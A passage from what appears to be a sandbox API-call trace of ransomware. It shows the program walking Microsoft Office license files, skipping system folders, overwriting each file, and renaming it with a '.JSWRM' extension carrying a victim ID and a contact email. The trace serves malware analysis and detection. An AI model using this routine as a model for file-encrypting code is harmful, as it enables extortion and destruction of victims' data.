lpDistanceToMoveHigh=0x0) returned 0x0 [0107.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d80) returned 0x24c1d0 [0107.708] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d80, lpOverlapped=0x0) returned 1 [0107.711] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.711] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d80, lpOverlapped=0x0) returned 1 [0107.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.711] CloseHandle (hObject=0x45c) returned 1 [0107.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0107.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0107.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0107.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0107.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0107.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0107.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.712] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_Subscription-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subscription-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_Subscription-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subscription-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0107.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0107.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0107.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.713] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8fbbbf6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8fbbbf6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe915f5fe, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bb3, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProCO365R_SubTest-pl.xrm-ms", cAlternateFileName="PRB760~1.XRM")) returned 1 [0107.713] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-pl.xrm-ms", lpString2=".") returned 1 [0107.713] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-pl.xrm-ms", lpString2="..") returned 1 [0107.713] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-pl.xrm-ms", lpString2="...") returned 1 [0107.713] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-pl.xrm-ms", lpString2="windows") returned -1 [0107.713] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-pl.xrm-ms", lpString2="recovery") returned -1 [0107.713] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-pl.xrm-ms", lpString2="perflogs") returned 1 [0107.713] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-pl.xrm-ms", lpString2="documents and settings") returned 1 [0107.713] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.713] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-pl.xrm-ms", lpString2="system volume information") returned -1 [0107.713] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-pl.xrm-ms", lpString2="msocache") returned 1 [0107.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0107.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_SubTest-pl.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0107.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_SubTest-pl.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProCO365R_SubTest-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0107.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0107.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0107.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_SubTest-pl.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0107.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_SubTest-pl.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d298, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProCO365R_SubTest-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0107.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0107.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0107.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0107.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0107.714] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_SubTest-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subtest-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.714] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11187) returned 1 [0107.714] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0107.714] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bb0, lpOverlapped=0x0) returned 1 [0107.717] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.717] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bb0, lpOverlapped=0x0) returned 1 [0107.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.717] CloseHandle (hObject=0x45c) returned 1 [0107.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0107.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0107.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0107.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0107.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0107.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0107.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.718] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_SubTest-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subtest-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_SubTest-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subtest-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0107.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0107.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0107.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.719] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8f2329d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8f2329d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe902e315, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x51b6, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProCO365R_SubTest-ppd.xrm-ms", cAlternateFileName="PR6056~1.XRM")) returned 1 [0107.719] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-ppd.xrm-ms", lpString2=".") returned 1 [0107.719] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-ppd.xrm-ms", lpString2="..") returned 1 [0107.719] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-ppd.xrm-ms", lpString2="...") returned 1 [0107.719] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-ppd.xrm-ms", lpString2="windows") returned -1 [0107.719] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-ppd.xrm-ms", lpString2="recovery") returned -1 [0107.719] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-ppd.xrm-ms", lpString2="perflogs") returned 1 [0107.719] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0107.719] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.719] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-ppd.xrm-ms", lpString2="system volume information") returned -1 [0107.719] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-ppd.xrm-ms", lpString2="msocache") returned 1 [0107.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0107.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_SubTest-ppd.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0107.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_SubTest-ppd.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22cdc8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProCO365R_SubTest-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0107.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0107.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0107.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_SubTest-ppd.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0107.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_SubTest-ppd.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22d260, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProCO365R_SubTest-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0107.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0107.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0107.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0107.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0107.720] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_SubTest-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subtest-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.720] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20918) returned 1 [0107.720] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51b0) returned 0x24c1d0 [0107.720] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x51b0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x51b0, lpOverlapped=0x0) returned 1 [0107.723] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.723] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x51b0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x51b0, lpOverlapped=0x0) returned 1 [0107.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.724] CloseHandle (hObject=0x45c) returned 1 [0107.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0107.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0107.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0107.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0107.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23fa98 [0107.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0107.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.724] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_SubTest-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subtest-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_SubTest-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subtest-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0107.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0107.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0107.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.725] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8f2329d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8f2329d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9054589, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d71, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProCO365R_SubTest-ul-oob.xrm-ms", cAlternateFileName="PR13F1~1.XRM")) returned 1 [0107.726] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-ul-oob.xrm-ms", lpString2=".") returned 1 [0107.726] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-ul-oob.xrm-ms", lpString2="..") returned 1 [0107.726] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-ul-oob.xrm-ms", lpString2="...") returned 1 [0107.726] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-ul-oob.xrm-ms", lpString2="windows") returned -1 [0107.726] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0107.726] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0107.726] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0107.726] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.726] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0107.726] lstrcmpiW (lpString1="ProjectProCO365R_SubTest-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0107.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0107.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_SubTest-ul-oob.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0107.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_SubTest-ul-oob.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d0a0, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProCO365R_SubTest-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0107.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0107.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0107.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_SubTest-ul-oob.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0107.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProCO365R_SubTest-ul-oob.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d260, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProCO365R_SubTest-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0107.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0107.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0107.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0107.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, 